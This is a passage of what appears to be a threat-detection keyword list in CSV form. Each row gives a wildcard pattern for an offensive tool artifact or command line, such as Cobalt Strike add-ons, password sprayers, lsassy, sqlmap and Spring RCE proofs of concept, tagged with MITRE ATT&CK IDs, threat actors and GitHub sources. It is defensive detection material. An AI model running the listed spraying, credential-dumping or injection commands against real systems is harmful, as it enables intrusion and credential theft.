+"*SpoolTrigger.x64.dl*","offensive_tool_keyword","cobaltstrike","Spectrum Attack Simulation beacons","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/nccgroup/nccfsas/","1","1","N/A","10","10","594","117","2022-08-05T16:25:42Z","2020-06-25T09:33:45Z"
+"*SpoolTrigger.x64.dll*","offensive_tool_keyword","cobaltstrike","Information released publicly by NCC Group's Full Spectrum Attack Simulation (FSAS) team","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - 
T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/nccgroup/nccfsas","1","1","N/A","10","10","594","117","2022-08-05T16:25:42Z","2020-06-25T09:33:45Z"
+"*SpoolTrigger.x86.dl*","offensive_tool_keyword","cobaltstrike","Spectrum Attack Simulation beacons","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - 
CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/nccgroup/nccfsas/","1","1","N/A","10","10","594","117","2022-08-05T16:25:42Z","2020-06-25T09:33:45Z" +"*SpoolTrigger.x86.dll*","offensive_tool_keyword","cobaltstrike","Information released publicly by NCC Group's Full Spectrum Attack Simulation (FSAS) team","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/nccgroup/nccfsas","1","1","N/A","10","10","594","117","2022-08-05T16:25:42Z","2020-06-25T09:33:45Z" +"*SpoolTrigger\SpoolTrigger.*","offensive_tool_keyword","cobaltstrike","Spectrum Attack Simulation beacons","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - 
T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/nccgroup/nccfsas/","1","0","N/A","10","10","594","117","2022-08-05T16:25:42Z","2020-06-25T09:33:45Z" +"*spray* --recon *.* -u *.txt --threads 10*","offensive_tool_keyword","TREVORspray","TREVORspray is a modular password sprayer with threading - clever proxying - loot modules and more","T1110.003 - T1059.005 - T1071.001","TA0001 - TA0002","N/A","N/A","Credential Access","https://github.com/blacklanternsecurity/TREVORspray","1","0","N/A","10","8","797","127","2023-09-15T23:01:06Z","2020-09-06T23:02:37Z" +"*Spray365.git*","offensive_tool_keyword","Spray365","Spray365 is a password spraying tool that identifies valid credentials for Microsoft accounts (Office 365 / Azure AD).","T1110.003","TA0006","N/A","N/A","Credential Access","https://github.com/MarkoH17/Spray365","1","1","N/A","N/A","3","296","53","2022-07-14T14:45:57Z","2021-11-04T18:20:39Z" +"*spray365.py*","offensive_tool_keyword","Spray365","Spray365 is a password spraying tool that identifies valid credentials for Microsoft accounts (Office 365 / Azure AD).","T1110.003","TA0006","N/A","N/A","Credential Access","https://github.com/MarkoH17/Spray365","1","1","N/A","N/A","3","296","53","2022-07-14T14:45:57Z","2021-11-04T18:20:39Z" +"*spray365_results_*.json*","offensive_tool_keyword","Spray365","Spray365 is a password spraying tool that identifies valid credentials for Microsoft accounts (Office 365 / Azure 
AD).","T1110.003","TA0006","N/A","N/A","Credential Access","https://github.com/MarkoH17/Spray365","1","1","N/A","N/A","3","296","53","2022-07-14T14:45:57Z","2021-11-04T18:20:39Z" +"*Spray-AD *","offensive_tool_keyword","cobaltstrike","A Cobalt Strike tool to audit Active Directory user accounts for weak - well known or easy guessable passwords.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/outflanknl/Spray-AD","1","0","N/A","10","10","408","58","2022-04-01T07:03:39Z","2020-01-09T10:10:48Z" +"*Spray-AD.cna*","offensive_tool_keyword","cobaltstrike","A Cobalt Strike tool to audit Active Directory user accounts for weak - well known or easy guessable passwords.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - 
T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/outflanknl/Spray-AD","1","1","N/A","10","10","408","58","2022-04-01T07:03:39Z","2020-01-09T10:10:48Z" +"*Spray-AD.dll*","offensive_tool_keyword","cobaltstrike","A Cobalt Strike tool to audit Active Directory user accounts for weak - well known or easy guessable passwords.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - 
APT29","C2","https://github.com/outflanknl/Spray-AD","1","1","N/A","10","10","408","58","2022-04-01T07:03:39Z","2020-01-09T10:10:48Z" +"*Spray-AD.exe*","offensive_tool_keyword","cobaltstrike","A Cobalt Strike tool to audit Active Directory user accounts for weak - well known or easy guessable passwords.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/outflanknl/Spray-AD","1","1","N/A","10","10","408","58","2022-04-01T07:03:39Z","2020-01-09T10:10:48Z" +"*Spray-AD.sln*","offensive_tool_keyword","cobaltstrike","A Cobalt Strike tool to audit Active Directory user accounts for weak - well known or easy guessable passwords.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 
- T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/outflanknl/Spray-AD","1","1","N/A","10","10","408","58","2022-04-01T07:03:39Z","2020-01-09T10:10:48Z" +"*Spray-AD\Spray-AD*","offensive_tool_keyword","cobaltstrike","A Cobalt Strike tool to audit Active Directory user accounts for weak - well known or easy guessable passwords.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/outflanknl/Spray-AD","1","0","N/A","10","10","408","58","2022-04-01T07:03:39Z","2020-01-09T10:10:48Z" +"*sprayhound 
-*","offensive_tool_keyword","sprayhound","Password spraying tool and Bloodhound integration","T1110.003 - T1210.001 - T1069.002","TA0006 - TA0007 - TA0003","N/A","N/A","Credential Access","https://github.com/Hackndo/sprayhound","1","0","N/A","N/A","2","136","12","2023-02-15T11:26:53Z","2020-02-06T17:45:37Z" +"*sprayhound -d *","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" +"*sprayhound-master.zip*","offensive_tool_keyword","sprayhound","Password spraying tool and Bloodhound integration","T1110.003 - T1210.001 - T1069.002","TA0006 - TA0007 - TA0003","N/A","N/A","Credential Access","https://github.com/Hackndo/sprayhound","1","1","N/A","N/A","2","136","12","2023-02-15T11:26:53Z","2020-02-06T17:45:37Z" +"*SprayingToolkit.git*","offensive_tool_keyword","SprayingToolkit","Scripts to make password spraying attacks against Lync/S4B. OWA & O365 a lot quicker. less painful and more efficient","T1110 - T1078 - T1133 - T1061","TA0001 - TA0002 - TA0003","N/A","N/A","Credential Access","https://github.com/byt3bl33d3r/SprayingToolkit","1","1","N/A","10","10","1352","268","2022-10-17T01:01:57Z","2018-09-13T09:52:11Z" +"*SprayingToolkit-master*","offensive_tool_keyword","SprayingToolkit","Scripts to make password spraying attacks against Lync/S4B. OWA & O365 a lot quicker. 
less painful and more efficient","T1110 - T1078 - T1133 - T1061","TA0001 - TA0002 - TA0003","N/A","N/A","Credential Access","https://github.com/byt3bl33d3r/SprayingToolkit","1","0","N/A","10","10","1352","268","2022-10-17T01:01:57Z","2018-09-13T09:52:11Z" +"*SprayingToolkit-master.zip*","offensive_tool_keyword","SprayingToolkit","Scripts to make password spraying attacks against Lync/S4B. OWA & O365 a lot quicker. less painful and more efficient","T1110 - T1078 - T1133 - T1061","TA0001 - TA0002 - TA0003","N/A","N/A","Credential Access","https://github.com/byt3bl33d3r/SprayingToolkit","1","1","N/A","10","10","1352","268","2022-10-17T01:01:57Z","2018-09-13T09:52:11Z" +"*spraykatz*","offensive_tool_keyword","spraykatz","Spraykatz is a tool without any pretention able to retrieve credentials on Windows machines and large Active Directory environments.","T1003 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1003.005 - T1003.006 - T1003.007 - T1003.008","TA0003 - TA0004 - TA0007","N/A","N/A","Credential Access","https://github.com/aas-n/spraykatz","1","1","N/A","N/A","8","737","126","2020-06-20T12:14:00Z","2019-09-09T14:38:28Z" +"*spring_framework_malicious_jar*","offensive_tool_keyword","beef","BeEF is short for The Browser Exploitation Framework. 
It is a penetration testing tool that focuses on the web browser.","T1201 - T1505.003","TA0001 - TA0002","N/A","N/A","Frameworks","https://github.com/beefproject/beef","1","1","N/A","N/A","10","8796","2026","2023-09-30T17:06:35Z","2011-11-23T06:53:25Z" +"*Spring-cloud-function-SpEL-RCE*","offensive_tool_keyword","POC","RCE PoC of 0-day Vulnerability found in Spring Cloud (SPEL)","T1059 - T1210 - T1507","TA0002 - TA0040 - TA0043","N/A","N/A","Exploitation tools","https://github.com/chaosec2021/Spring-cloud-function-SpEL-RCE","1","1","N/A","N/A",,"N/A",,, +"*spring-core-rce*ROOT.war*","offensive_tool_keyword","spring-core-rce","CVE-2022-22965 : about spring core rce","T1550 - T1555 - T1212 - T1558","TA0001 - TA0004 - TA0006","N/A","N/A","Exploitation tools","https://github.com/Mr-xn/spring-core-rce","1","1","N/A","N/A","1","54","18","2022-04-01T15:34:03Z","2022-03-30T14:35:00Z" +"*springFramework_CVE-2022-22965_RCE.py*","offensive_tool_keyword","POC","SpringFramework CVE-2022-22965","T1550 - T1555 - T1212 - T1558","TA0001 - TA0004 - TA0006","N/A","N/A","Exploitation tools","https://github.com/Axx8/SpringFramework_CVE-2022-22965_RCE","1","0","N/A","N/A","1","76","17","2022-04-01T12:08:45Z","2022-04-01T04:51:44Z" +"*spyonweb-get-rootdomains *","offensive_tool_keyword","thoth","Automate recon for red team assessments.","T1190 - T1083 - T1018","TA0007 - TA0043 - TA0001","N/A","N/A","Reconnaissance","https://github.com/r1cksec/thoth","1","0","N/A","7","1","75","8","2023-09-27T06:46:46Z","2021-11-15T13:40:56Z" +"*sql_persister.py*","offensive_tool_keyword","wapiti","Web vulnerability scanner written in Python3","T1592 - T1592.003","TA0007 - TA0040","N/A","N/A","Web Attacks","https://github.com/wapiti-scanner/wapiti","1","1","N/A","N/A","8","785","132","2023-10-04T14:09:48Z","2020-06-06T20:17:55Z" +"*SqlClrPayload*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. 
and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*sqldumper.py*","offensive_tool_keyword","lsassy","Extract credentials from lsass remotely","T1003.001 - T1021.001 - T1021.002 - T1555.003","TA0006","N/A","N/A","Credential Access","https://github.com/Hackndo/lsassy","1","1","N/A","N/A","10","1745","232","2023-10-04T19:25:30Z","2019-12-03T14:03:41Z" +"*sqli_common_shared.rb*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*Sqli-lab*","offensive_tool_keyword","sqli-labs","SQLI-LABS is a platform to learn SQLI Following labs are covered for GET and POST scenarios:","T1190 - T1553","TA0002 - TA0008","N/A","N/A","Web Attacks","https://github.com/Audi-1/sqli-labs","1","1","N/A","N/A","10","4688","1475","2020-06-04T19:51:55Z","2012-05-19T19:41:26Z" +"*SQL-Injection-Auth-Bypass-Payloads.*","offensive_tool_keyword","Offensive-Payloads","List of payloads and wordlists that are specifically crafted to identify and exploit vulnerabilities in target web applications.","T1210 - T1185 - T1059 - T1400 - T1506 - T1213 ","TA0001 - TA0002 - TA0009","N/A","N/A","List","https://github.com/InfoSecWarrior/Offensive-Payloads/","1","1","N/A","N/A","2","116","43","2023-09-11T17:20:51Z","2022-11-18T09:43:41Z" +"*SQL-Injection-Libraries*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*SQL-Injection-Payloads.*","offensive_tool_keyword","Offensive-Payloads","List of payloads and wordlists that are specifically crafted to identify and exploit vulnerabilities in target web applications.","T1210 - T1185 - T1059 - T1400 - T1506 - T1213 ","TA0001 - TA0002 - TA0009","N/A","N/A","List","https://github.com/InfoSecWarrior/Offensive-Payloads/","1","1","N/A","N/A","2","116","43","2023-09-11T17:20:51Z","2022-11-18T09:43:41Z" +"*SQLiPy.py*","offensive_tool_keyword","sqlipy","SQLiPy is a Python plugin for Burp Suite that integrates SQLMap using the SQLMap API.","T1190 - T1210 - T1574","TA0002 - TA0040 - TA0043","N/A","N/A","Network Exploitation tools","https://github.com/codewatchorg/sqlipy","1","1","N/A","N/A","3","247","102","2023-05-08T18:50:41Z","2014-09-22T03:25:42Z" +"*SQLiScanner*","offensive_tool_keyword","SQLiScanner","Automatic SQL injection with Charles and sqlmapapi","T1190 - T1556 - T1210 - T1573","TA0002 - TA0003 - TA0008","N/A","N/A","Web Attacks","https://github.com/0xbug/SQLiScanner","1","1","N/A","N/A","8","760","298","2018-05-01T09:59:47Z","2016-08-28T06:06:32Z" +"*sqlite:///ares.db*","offensive_tool_keyword","Ares","Python C2 botnet and backdoor ","T1105 - T1102 - T1055","TA0003 - TA0002 - TA0007","N/A","N/A","C2","https://github.com/sweetsoftware/Ares","1","0","N/A","10","10","1439","524","2023-03-02T12:43:09Z","2015-10-18T12:26:27Z" +"*sqlmap -*","offensive_tool_keyword","sqlmap","Automatic SQL injection and database takeover tool.","T1190 - T1556 - T1574","TA0001 - TA0002 - 
TA0003","N/A","N/A","Exploitation tools","https://github.com/sqlmapproject/sqlmap","1","0","N/A","N/A","10","28287","5460","2023-09-28T18:34:55Z","2012-06-26T09:52:15Z" +"*sqlmap --forms --batch -u *","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" +"*sqlmap.conf*","offensive_tool_keyword","sqlmap","Automatic SQL injection and database takeover tool.","T1190 - T1059 - T1553 - T1574 - T1210 - T1220","TA0001 - TA0002 - TA0003 - TA0009","N/A","N/A","Exploitation tools","https://github.com/sqlmapproject/sqlmap","1","1","N/A","N/A","10","28287","5460","2023-09-28T18:34:55Z","2012-06-26T09:52:15Z" +"*sqlmap.py*","offensive_tool_keyword","sqlmap","Automatic SQL injection and database takeover tool.","T1190 - T1059 - T1553 - T1574 - T1210 - T1220","TA0001 - TA0002 - TA0003 - TA0009","N/A","N/A","Exploitation tools","https://github.com/sqlmapproject/sqlmap","1","1","N/A","N/A","10","28287","5460","2023-09-28T18:34:55Z","2012-06-26T09:52:15Z" +"*sqlmap.rb*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*sqlmap/data/txt/wordlist.txt*","offensive_tool_keyword","wordlists","package contains the rockyou.txt wordlist","T1110.001","TA0006","N/A","N/A","Credential Access","https://www.kali.org/tools/wordlists/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*sqlmap4burp*.jar*","offensive_tool_keyword","burpsuite","Collection of burpsuite plugins","T1556 - T1556.001 - T1556.002 - T1556.003 - T1557 - T1558 - T1573 - T1574","TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","Network Exploitation 